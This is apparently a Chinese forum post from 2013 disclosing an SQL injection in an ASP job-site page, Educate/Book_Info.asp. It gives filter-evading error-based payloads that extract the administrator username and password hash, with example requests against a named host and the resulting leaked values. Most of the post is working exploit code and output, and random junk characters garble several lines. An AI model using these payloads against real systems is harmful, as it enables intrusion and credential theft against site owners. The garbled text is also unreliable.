漏洞出现在Educate/Book_Info.asp
7 k9 p: r5 d! B. E此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出+ n8 Y2 y% ]1 K) m6 S
exp:如下
1 c8 O, i/ u$ v6 ^查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
8 Y3 }% J9 U @' s" f3 R r查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 W' \! E# y8 x5 Phttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)! w: ^. G1 O1 c. N7 _
Microsoft OLE DB Provider for SQL Server 错误 '80040e07', n m; R2 J4 p7 {- Z) B$ S
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。& ]. C+ m! c7 _+ x1 |: g; u
/Educate/Book_Info.asp,行 83 s2 t$ ]5 z' Y, l3 T. P8 h
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
0 K, v* J) |( ~5 g$ VMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
/ o& o @# j9 z! f/ X" @+ ^6 Y3 b( I将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。; [- S: ^0 X+ w" I' x) g- F( F
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对